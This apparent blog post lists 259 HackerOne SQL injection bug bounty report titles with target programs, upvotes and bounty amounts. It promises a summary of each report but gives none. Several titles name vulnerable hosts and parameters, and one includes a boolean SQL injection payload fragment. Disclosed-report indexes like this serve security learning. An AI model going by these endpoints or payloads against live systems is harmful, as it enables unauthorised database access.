Summarizing Top SQL Injection Bug bounty reports 👋

Quick summary ↬  Top SQL Injection reports and a small summary about each one of them to learn the hacker's mindset.

Top SQLI reports from HackerOne

1. SQL Injection Extracts Starbucks Enterprise Accounting, Financial, Payroll Database to Starbucks - 737 upvotes, 4000
2. SQL injection in https://labs.data.gov/dashboard/datagov/csv_to_json via User-agent to GSA Bounty - 665 upvotes, 2000
3. Time-Based SQL injection at city-mobil.ru to Mail.ru - 620 upvotes, 15000
4. SQL injection at https://sea-web.gold.razer.com/ajax-get-status.php via txid parameter to Razer - 580 upvotes, 2000
5. SQL Injection in https://api-my.pay.razer.com/inviteFriend/getInviteHistoryLog to Razer - 528 upvotes, 2000
6. SQL injection on contactws.contact-sys.com in TScenObject action ScenObjects leads to remote code execution to QIWI - 465 upvotes, 5500
7. Blind SQL Injection to InnoGames - 432 upvotes, 2000
8. SQL injection at fleet.city-mobil.ru to Mail.ru - 369 upvotes, 10000
9. SQL Injection in report_xml.php through countryFilter[] parameter to Valve - 347 upvotes, 25000
10. [windows10.hi-tech.mail.ru] Blind SQL Injection to Mail.ru - 326 upvotes, 5000
11. SQL Injection on cookie parameter to MTN Group - 299 upvotes, 0
12. [www.zomato.com] SQLi - /php/██████████ - item_id to Zomato - 279 upvotes, 4500
13. SQL Injection at https://sea-web.gold.razer.com/lab/cash-card-incomplete-translog-resend via period-hour Parameter to Razer - 240 upvotes, 2000
14. [api.easy2pay.co] SQL Injection at fortumo via TransID parameter [Bypassing Signature Validation🔥] to Razer - 232 upvotes, 4000
15. Boolean-based SQL Injection on relap.io to Mail.ru - 225 upvotes, 2000
16. Blind SQL Injection in city-mobil.ru domain to Mail.ru - 223 upvotes, 2000
17. SQL Injection in agent-manager to Acronis - 222 upvotes, 1500
18. Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice to Starbucks - 217 upvotes, 4000
19. SQL Injection in www.hyperpure.com to Zomato - 211 upvotes, 2000
20. Blind SQL injection and making any profile comments from any users to disappear using “like” function (2 in 1 issues) to Pornhub - 208 upvotes, 2500
21. Blind SQL Injection on starbucks.com.gt and WAF Bypass :* to Starbucks - 201 upvotes, 500
22. Remote Code Execution on contactws.contact-sys.com via SQL injection in TCertObject operation “Delete” to QIWI - 193 upvotes, 1000
23. SQLi at https://sea-web.gold.razer.com/demo-th/purchase-result.php via orderid Parameter to Razer - 183 upvotes, 2000
24. Blind SQL injection in Hall of Fap to Pornhub - 174 upvotes, 2500
25. www.drivegrab.com SQL injection to Grab - 172 upvotes, 4500
26. Sql injection on docs.atavist.com to Automattic - 156 upvotes, 200
27. SQL Injection [unauthenticated] with direct output at https://news.mail.ru/ to Mail.ru - 155 upvotes, 7500
28. bypass sql injection #1109311 to Acronis - 148 upvotes, 500
29. SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter to HackerOne - 147 upvotes, 0
30. SQL injection in Razer Gold List Admin at /lists/index.php via the list[] parameter. to Razer - 122 upvotes, 2000
31. SQL Injection Union Based to Automattic - 121 upvotes, 350
32. [intensedebate.com] SQL Injection Time Based On /js/commentAction/ to Automattic - 120 upvotes, 350
33. SQL Injection at api.easy2pay.co/add-on/get-sig.php via partner_id Parameter to Razer - 119 upvotes, 2000
34. SQL injection on contactws.contact-sys.com in TRateObject.AddForOffice in USER_ID parameter leads to remote code execution to QIWI - 117 upvotes, 1000
35. SQL Injection at https://files.palantir.com/ due to CVE-2021-38159 to Palantir Public - 107 upvotes, 5000
36. SQL injection on admin.acronis.host development web service to Acronis - 102 upvotes, 250
37. SQL injection in https://www.acronis.cz/ via the log parameter to Acronis - 95 upvotes, 250
38. turboslim.lady.mail.ru - Blind sql-injection. to Mail.ru - 90 upvotes, 5000
39. SQL Injection intensedebate.com to Automattic - 86 upvotes, 350
40. SQL injection on jd.mail.ru to Mail.ru - 86 upvotes, 300
41. Remote Code Execution on contactws.contact-sys.com via SQL injection in TAktifBankObject.GetOrder in parameter DOC_ID to QIWI - 84 upvotes, 2500
42. 3igames.mail.ru SQL Injection to Mail.ru - 84 upvotes, 1500
43. SQL Injection on sctrack.email.uber.com.cn to Uber - 80 upvotes, 4000
44. Blind SQL Injection at http://easytopup.in.th/es-services/mps.php via serial_no parameter to Razer - 80 upvotes, 1000
45. SQL Injection on www.██████████ on countID parameter to U.S. Dept Of Defense - 79 upvotes, 0
46. [Found Origin IP’s Lead To Access To Grafana Instance , PgHero Instance [ Can SQL Injection ] to Omise - 76 upvotes, 200
47. SQL injection delivery-club.ru (ClickHouse) to Mail.ru - 75 upvotes, 5000
48. SQL Injection on https://www.olx.co.id to OLX - 74 upvotes, 0
49. Arbitrary SQL command injection to Nextcloud - 73 upvotes, 500
50. [intensedebate.com] SQL Injection Time Based on /changeReplaceOpt.php to Automattic - 72 upvotes, 350
51. SQL injection at https://sea-web.gold.razer.com/demo-th/goto-e2p-web-api.php via Multiple Parameters to Razer - 71 upvotes, 2000
52. SQL Injection in ████ to U.S. Dept Of Defense - 71 upvotes, 0
53. Blind SQL Injection(Time Based Payload) in https://www.easytopup.in.th/store/game/digimon-master via CheckuserForm[user_id] to Razer - 68 upvotes, 1000
54. RCE, SQLi, IDOR, Auth Bypass and XSS at [staff.███.edu.eg ] to ██████ - 68 upvotes, 0
55. [https://reviews.zomato.com] Time Based SQL Injection to Zomato - 66 upvotes, 1000
56. Blind SQL injection at tsftp.informatica.com to Informatica - 66 upvotes, 0
57. SQL Injection at https://lite.r-keeper.ru/site_api/clients/derision/?lang=ru to Mail.ru - 61 upvotes, 1500
58. [www.zomato.com] SQLi on order_id parameter to Zomato - 60 upvotes, 1000
59. Blind SQL injection in third-party software, that allows to reveal user statistic from rocket.chat and possibly hack into the rocketchat.agilecrm.com to Rocket.Chat - 59 upvotes, 0
60. [www.zomato.com] Blind SQL Injection in /php/geto2banner to Zomato - 58 upvotes, 2000
61. SQL injection in 3rd party software Anomali to Uber - 57 upvotes, 2500
62. Time-base SQL Injection in Search Users to Concrete CMS - 56 upvotes, 0
63. [www.zomato.com] Union SQLi + Waf Bypass to Zomato - 54 upvotes, 1000
64. Remote Code Execution on contactws.contact-sys.com via SQL injection in TPrabhuObject.BeginOrder in parameter DOC_ID to QIWI - 52 upvotes, 2500
65. Unauthenticated SQL Injection at █████████ [HtUS] to U.S. Dept Of Defense - 52 upvotes, 1000
66. Blind SQL Injection on news.mail.ru to Mail.ru - 51 upvotes, 3000
67. SQL Injection https://www.olx.co.id to OLX - 51 upvotes, 0
68. SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) to LocalTapiola - 50 upvotes, 1350
69. A SQL injection vulnerability in Vanilla to Vanilla - 50 upvotes, 600
70. [contact-sys.com] SQL Injection████ limit param to QIWI - 50 upvotes, 250
71. SQL Injection in IBM access control panel & Broken access in admin panel to IBM - 48 upvotes, 0
72. SQL Injection in ████ to U.S. Dept Of Defense - 46 upvotes, 0
73. [www.zomato.com] Blind SQL Injection in /php/widgets_handler.php to Zomato - 45 upvotes, 2000
74. Vanilla SQL Injection Vulnerability to Vanilla - 44 upvotes, 600
75. SQL Injection vulnerability located at ████████ to U.S. Dept Of Defense - 44 upvotes, 0
76. [city-mobil.ru/taxiserv/] SQLi at /taxiserv/tariffs/dictionary at filter{“id_locality”} param to Mail.ru - 43 upvotes, 3500
77. SQL Injection on /webApp/omatalousuk (viestinta.lahitapiola.fi) to LocalTapiola - 41 upvotes, 1560
78. Multiple SQL Injections and constrained LFI in esk-static.3igames.mail.ru to Mail.ru - 40 upvotes, 1500
79. SQLI on uberpartner.eu leads to exposure of sensitive user data of Uber partners to Uber - 40 upvotes, 1500
80. Type Juggling -> PHP Object Injection -> SQL Injection Chain to ExpressionEngine - 39 upvotes, 0
81. SQL injection in MilestoneFinder order method to GitLab - 38 upvotes, 2000
82. [www.zomato.com] Boolean SQLi - /█████.php to Zomato - 38 upvotes, 1000
83. SQL injection in Wordpress Plugin Huge IT Video Gallery at https://drive.uber.com/frmarketplace/ to Uber - 37 upvotes, 3000
84. SQL Injection in sijoitustalous_peruutus (viestinta.lahitapiola.fi) to LocalTapiola - 36 upvotes, 1350
85. Blind SQL Injection to MTN Group - 36 upvotes, 0
86. [www.zomato.com] Boolean SQLi - /███████.php to Zomato - 34 upvotes, 1000
87. sqli to Ubiquiti Inc. - 33 upvotes, 1000
88. Blind SQL injection [https://honor.hi-tech.mail.ru] to Mail.ru - 33 upvotes, 300
89. Time-based Blind SQLi on news.starbucks.com to Starbucks - 33 upvotes, 0
90. [lk.contact-sys.com] SQL Injection reset_password FP_LK_USER_LOGIN to QIWI - 32 upvotes, 300
91. SQL Injection at https://lite.r-keeper.ru/site_api/localize/translate/rklscommon/ru to Mail.ru - 31 upvotes, 1500
92. sql injection via https://setup.p2p.ihost.com/ to IBM - 31 upvotes, 0
93. Blind SQL injection on [city-mobil.ru/taxiserv/] in filter{“id_locality”} to Mail.ru - 30 upvotes, 3500
94. Time Based SQL-inject in post-parametr login[username] [domain - youporn.com] to Pornhub - 30 upvotes, 2500
95. SQL Injection found in NextCloud Android App Content Provider to Nextcloud - 30 upvotes, 150
96. Sql-inj in https://maximum.com/ajax/people to Radancy - 29 upvotes, 40
97. allods.mail.ru sql injection to Mail.ru - 28 upvotes, 2200
98. SQL injection to U.S. Dept Of Defense - 28 upvotes, 0
99. SQL injection my method -1 OR 321=6 AND 000159=000159 to U.S. Dept Of Defense - 28 upvotes, 0
100. SQL injection in URL path processing on www.ibm.com to IBM - 28 upvotes, 0
101. SQL Injection on /cs/Satellite path to LocalTapiola - 27 upvotes, 400
102. SQL Injection /webApp/cancel_iltakoulu regId parameter (viestinta.lahitapiola.fi) to LocalTapiola - 26 upvotes, 1350
103. SQL injection in partner id field on https://www.teavana.com (Sign-up form) to Starbucks - 26 upvotes, 250
104. [ipm.informatica.com] Sql injection Oracle to Informatica - 26 upvotes, 0
105. SQLI on desafio5estrelas.com to Uber - 24 upvotes, 2500
106. SQL injection at [https://█████████] [HtUS] to U.S. Dept Of Defense - 24 upvotes, 1000
107. SQL Injection in the move_papers.php on the https://██████████ to U.S. Dept Of Defense - 24 upvotes, 0
108. SQL Injection on the administrator panel to MTN Group - 23 upvotes, 0
109. gmmovinparts.com SQLi via forgot_password.jsp to General Motors - 22 upvotes, 0
110. SQL injection on the https://████/ to U.S. Dept Of Defense - 22 upvotes, 0
111. Ability to escape database transaction through SQL injection, leading to arbitrary code execution to HackerOne - 22 upvotes, 0
112. SQL Injection at https://████████.asp (█████████) [selMajcom] [HtUS] to U.S. Dept Of Defense - 22 upvotes, 0
113. [critical] sql injection by GET method to Khan Academy - 21 upvotes, 0
114. SQL Injection, exploitable in boolean mode to Zomato - 20 upvotes, 300
115. Blind Based SQL Injection in 3d.sc.money to CS Money - 20 upvotes, 0
116. Blind User-Agent SQL Injection to Blind Remote OS Command Execution at █████████ to Sony - 20 upvotes, 0
117. SQL Injection in lapsuudenturva (viestinta.lahitapiola.fi) to LocalTapiola - 19 upvotes, 1350
118. SQLi allow query restriction bypass on exposed FileContentProvider to Nextcloud - 19 upvotes, 100
119. SQL Injection at /displayPDF.php (printshop.engelvoelkers.com) to Engel & Völkers Technology GmbH - 19 upvotes, 0
120. SQL Injection on https://soa-accp.glbx.tva.gov/ via “/api/” path - VI-21-015 to Tennessee Valley Authority - 19 upvotes, 0
121. SQL Injection on /webApp/sijoitustalousuk email-parameter + potential lack of CSRF Token (viestinta.lahitapiola.fi) to LocalTapiola - 17 upvotes, 1350
122. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 17 upvotes, 0
123. WordPress DB Class, bad implementation of prepare method guides to sqli and information disclosure to WordPress - 17 upvotes, 0
124. Pre-Auth Blind NoSQL Injection leading to Remote Code Execution to Rocket.Chat - 17 upvotes, 0
125. Blind SQL iNJECTION to U.S. Dept Of Defense - 17 upvotes, 0
126. Unsafe deserialization in Libera Pay allows to escalate a SQL injection to Remote Command Execution to Liberapay - 16 upvotes, 0
127. SQL Injection through /include/findusers.php to ImpressCMS - 16 upvotes, 0
128. time based SQL injection at [https://███] [HtUS] to U.S. Dept Of Defense - 15 upvotes, 1000
129. uchi.ru check_lessons Blind SQL Injection to Mail.ru - 15 upvotes, 750
130. SQL Injection /webApp/sijoitustalous_peruutus locId parameter (viestinta.lahitapiola.fi) to LocalTapiola - 15 upvotes, 350
131. [typeorm] SQL Injection to Node.js third-party modules - 15 upvotes, 0
132. https://zest.co.th/zestlinepay/checkproduct API endpoint suffers from Boolean-based SQL injection to Razer - 15 upvotes, 0
133. SQL Injection on [█████████] to Sony - 15 upvotes, 0
134. C++: Support Pqxx connector to search for sql injections to Postgres to GitHub Security Lab - 14 upvotes, 4500
135. Local SQL Injection in Content Provider (ru.mail.data.contact.ContactsProvider) of Mail.ru for Android, version 12.2.0.29734 to Mail.ru - 14 upvotes, 150
136. [Informational] Possible SQL Injection in inc/ajax-actions-frontend.php to MapsMarker.com e.U. - 14 upvotes, 10
137. Blind SQLi vulnerability in a DoD Website to U.S. Dept Of Defense - 14 upvotes, 0
138. [untitled-model] sql injection to Node.js third-party modules - 14 upvotes, 0
139. Blind SQL injection on ████████ to U.S. Dept Of Defense - 14 upvotes, 0
140. [api.easy2pay.co] SQL Injection in cashcard via card_no parameter ⭐️Bypassing IP whitelist⭐️ to Razer - 14 upvotes, 0
141. Drupal 7 pre auth sql injection and remote code execution to Internet Bug Bounty - 13 upvotes, 3000
142. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 13 upvotes, 0
143. [query-mysql] SQL Injection due to lack of user input sanitization allows to run arbitrary SQL queries when fetching data from database to Node.js third-party modules - 13 upvotes, 0
144. SQL injection at [█████████] [HtUS] to U.S. Dept Of Defense - 12 upvotes, 1000
145. Code source discloure & ability to get database information “SQL injection” in [townwars.mail.ru] to Mail.ru - 12 upvotes, 150
146. blind sql injection to Hanno’s projects - 12 upvotes, 0
147. SQL injections to U.S. Dept Of Defense - 12 upvotes, 0
148. SQL injection when configuring a database to ImpressCMS - 12 upvotes, 0
149. SQL Injection on █████ to U.S. Dept Of Defense - 12 upvotes, 0
150. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 11 upvotes, 0
151. MSSQL injection via param Customwho in https://█████/News/Transcripts/Search/Sort/ and WAF bypass to U.S. Dept Of Defense - 11 upvotes, 0
152. stripo blog search SQL Injection to Stripo Inc - 11 upvotes, 0
153. SQL Injection in Login Page: https://█████/█████████/login.php to U.S. Dept Of Defense - 11 upvotes, 0
154. [city-mobil.ru/taxiserv/] SQLi at /taxiserv/requests path at driver_company param to Mail.ru - 10 upvotes, 3500
155. bit.games - sql-inj to Mail.ru - 10 upvotes, 1500
156. SQL injection on █████ due to tech.cfm to U.S. Dept Of Defense - 10 upvotes, 0
157. Time-based sql-injection на https://puzzle.mail.ru to Mail.ru - 9 upvotes, 300
158. Blind SQLi in a DoD Website to U.S. Dept Of Defense - 9 upvotes, 0
159. Time Based SQL Injection vulnerability on a DoD website to U.S. Dept Of Defense - 9 upvotes, 0
160. Post-Auth Blind NoSQL Injection in the users.list API leads to Remote Code Execution to Rocket.Chat - 9 upvotes, 0
161. SQL Injection and plaintext passwords via User Search to IBM - 9 upvotes, 0
162. Sql Injection At █████████ to U.S. Dept Of Defense - 9 upvotes, 0
163. [afocusp.informatica.com] Sql injection afocusp.informatica.com:37777 to Informatica - 8 upvotes, 0
164. [Android API] SQL injection ( errortoken.json ) to Pornhub - 8 upvotes, 0
165. [███] SQL injection & Reflected XSS to U.S. Dept Of Defense - 8 upvotes, 0
166. SQLi in login form of █████ to U.S. Dept Of Defense - 8 upvotes, 0
167. SQLi on █████████ to U.S. Dept Of Defense - 8 upvotes, 0
168. SQL Injection on /webApp/lapsuudenturva (viestinta.lahitapiola.fi) to LocalTapiola - 7 upvotes, 1350
169. Sql injection on /webApp/sijoituswebinaari (viestinta.lahitapiola.fi) to LocalTapiola - 7 upvotes, 350
170. SQL Injection on /webApp/viivanalle (viestinta.lahitapiola.fi) to LocalTapiola - 7 upvotes, 350
171. Blind SQL Injection to ok.ru - 7 upvotes, 300
172. [cfire.mail.ru] Time Based SQL Injection 2 to Mail.ru - 7 upvotes, 200
173. [informatica.com] Blind SQL Injection to Informatica - 7 upvotes, 0
174. SQL Injection vulnerability on a DoD website to U.S. Dept Of Defense - 7 upvotes, 0
175. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 7 upvotes, 0
176. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 7 upvotes, 0
177. Weak credentials, Blind SQLi, Timing attack, that leads to web admin access to 50m-ctf - 7 upvotes, 0
178. [████████] Boolean SQL Injection (/personnel.php?content=profile&rcnum=*) to U.S. Dept Of Defense - 7 upvotes, 0
179. SQL Injection in www.██████████ to U.S. Dept Of Defense - 7 upvotes, 0
180. SQL Injection leads to retrieve the contents of an entire database. to BlockDev Sp. Z o.o - 7 upvotes, 0
181. SQL injextion via vulnerable doctrine/dbal version to Nextcloud - 7 upvotes, 0
182. SQL Injection on https://████████/ to U.S. Dept Of Defense - 7 upvotes, 0
183. SQL Injection in the get_publications.php on the https://█████ to U.S. Dept Of Defense - 6 upvotes, 0
184. SQL Injection or Denial of Service due to a Prototype Pollution to Node.js third-party modules - 6 upvotes, 0
185. SQL injection at /admin.php?/cp/members/create to ExpressionEngine - 6 upvotes, 0
186. SQL Injection in █████ to U.S. Dept Of Defense - 6 upvotes, 0
187. SQLi on http://sports.yahoo.com/nfl/draft to Yahoo! - 5 upvotes, 3705
188. Golang : Add MongoDb NoSQL injection sinks to GitHub Security Lab - 5 upvotes, 1800
189. tmgame.mail.ru - Blind sql injection to Mail.ru - 5 upvotes, 250
190. [townwars.mail.ru] Time-Based SQL Injection to Mail.ru - 5 upvotes, 150
191. [parapa.mail.ru] SQL Injection reapet to Mail.ru - 5 upvotes, 150
192. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 5 upvotes, 0
193. sql injection vulnerablity found to Legal Robot - 5 upvotes, 0
194. sql injection on /messagecenter/messagingcenter at https://www.███████/ to U.S. Dept Of Defense - 5 upvotes, 0
195. SQL injection [futexpert.mtngbissau.com] to MTN Group - 5 upvotes, 0
196. Blind SQL Injection to U.S. Dept Of Defense - 5 upvotes, 0
197. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
198. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
199. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
200. SQL injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
201. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
202. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
203. Code reversion allowing SQLI again in ███████ to U.S. Dept Of Defense - 4 upvotes, 0
204. SQLi in love.uber.com to Uber - 3 upvotes, 3000
205. SQL Injection ON HK.Promotion to Yahoo! - 3 upvotes, 1000
206. caesary.yahoo.net Blind Sql Injection to Yahoo! - 3 upvotes, 0
207. Time Based SQL Injection vulnerability on a DoD website to U.S. Dept Of Defense - 3 upvotes, 0
208. SQL injection in Serendipity (serendipity_fetchComments) to Hanno’s projects - 3 upvotes, 0
209. SQL injection on https://███████ to U.S. Dept Of Defense - 3 upvotes, 0
210. [CRITICAL] Sql Injection on http://axa.dxi.eu to 8x8 - 3 upvotes, 0
211. [████] SQL Injections on Referer Header exploitable via Time-Based method to U.S. Dept Of Defense - 3 upvotes, 0
212. SQL injection located in ███ in POST param ████████ to U.S. Dept Of Defense - 3 upvotes, 0
213. [Python]: Add SqlAlchemy support for SQL injection query to GitHub Security Lab - 2 upvotes, 4500
214. [Python] CWE-943: Add NoSQL Injection Query to GitHub Security Lab - 2 upvotes, 1800
215. [https://www.anghami.com/updatemailinfo/] Sql Injection to Anghami - 2 upvotes, 300
216. [orsotenslimselfie.lady.mail.ru] SQL Injection to Mail.ru - 2 upvotes, 300
217. SQL injection update.mail.ru to Mail.ru - 2 upvotes, 250
218. SQL inj to Mail.ru - 2 upvotes, 150
219. SQL Injection on 11x11.mail.ru to Mail.ru - 2 upvotes, 150
220. [tidaltrek.mail.ru] SQL Injection to Mail.ru - 2 upvotes, 150
221. Sql injection And XSS to Khan Academy - 2 upvotes, 0
222. Possible SQL injection can cause denial of service attack to Dropbox - 2 upvotes, 0
223. SQL injection in conc/index.php/ccm/system/search/users/submit to Concrete CMS - 2 upvotes, 0
224. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 2 upvotes, 0
225. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 2 upvotes, 0
226. sql does not properly escape parameters when building SQL queries, resulting in potential SQLi to Node.js third-party modules - 2 upvotes, 0
227. Blind SQL Injection on DoD Site to U.S. Dept Of Defense - 2 upvotes, 0
228. [@azhou/basemodel] SQL injection to Node.js third-party modules - 2 upvotes, 0
229. Followup - SQL Injection - https://██████████/██████/MSI.portal to U.S. Dept Of Defense - 2 upvotes, 0
230. SQL injection (stacked queries) in the export to Excel functionality on Vidyo Server to 8x8 - 2 upvotes, 0
231. SQL INJECTION in https://████/██████████ to U.S. Dept Of Defense - 2 upvotes, 0
232. NoSQL-Injection discloses S3 File Upload URLs to Rocket.Chat - 2 upvotes, 0
233. [Java] CWE-089: MyBatis Mapper XML SQL Injection to GitHub Security Lab - 1 upvotes, 4500
234. Active Record SQL Injection Vulnerability Affecting PostgreSQL to Ruby on Rails - 1 upvotes, 1500
235. Active Record SQL Injection Vulnerability Affecting PostgreSQL to Ruby on Rails - 1 upvotes, 1500
236. SQL inj to Mail.ru - 1 upvotes, 150
237. [parapa.mail.ru] SQL Injection to Mail.ru - 1 upvotes, 150
238. [3k.mail.ru] SQL Injection to Mail.ru - 1 upvotes, 150
239. SQL Injection to Mail.ru - 1 upvotes, 150
240. [tidaltrek.mail.ru] SQL Injection to Mail.ru - 1 upvotes, 150
241. Possible SQL injection on “Jump to twitter” to Gratipay - 1 upvotes, 1
242. SQL injection, tile ID to Uzbey - 1 upvotes, 0
243. SQL Injection to Uzbey - 1 upvotes, 0
244. Blind SQL INJ to Paragon Initiative Enterprises - 1 upvotes, 0
245. Time Based SQL injection in url parameter to WebSummit - 1 upvotes, 0
246. SQL Injection Proof of Concept for Starbucks URL to Starbucks - 1 upvotes, 0
247. typeorm does not properly escape parameters when building SQL queries, resulting in potential SQLi to Node.js third-party modules - 1 upvotes, 0
248. SQL injection found in US Navy Website (http://███/) to U.S. Dept Of Defense - 1 upvotes, 0
249. [increments] sql injection to Node.js third-party modules - 1 upvotes, 0
250. [afisha.mail.ru] SQL Injection to Mail.ru - 0 upvotes, 300
251. SQL injection [дырка в движке форума] to Mail.ru - 0 upvotes, 200
252. Time based sql injection to Mail.ru - 0 upvotes, 200
253. [cfire.mail.ru] Time Based SQL Injection to Mail.ru - 0 upvotes, 150
254. Time-Based Blind SQL Injection Attacks to Mail.ru - 0 upvotes, 150
255. SQL injection, time zoom script, tile ID to Uzbey - 0 upvotes, 0
256. SQL Injection Vulnerability in Concrete5 version 5.7.3.1 to Concrete CMS - 0 upvotes, 0
257. Possible Blind SQL injection | Language choice in presentation to Gratipay - 0 upvotes, 0
258. Two Error-Based SQLi in courses.aspx on ██████████ to U.S. Dept Of Defense - 0 upvotes, 0
259. SQL Injection - https://███/█████████/MSI.portal to U.S. Dept Of Defense - 0 upvotes, 0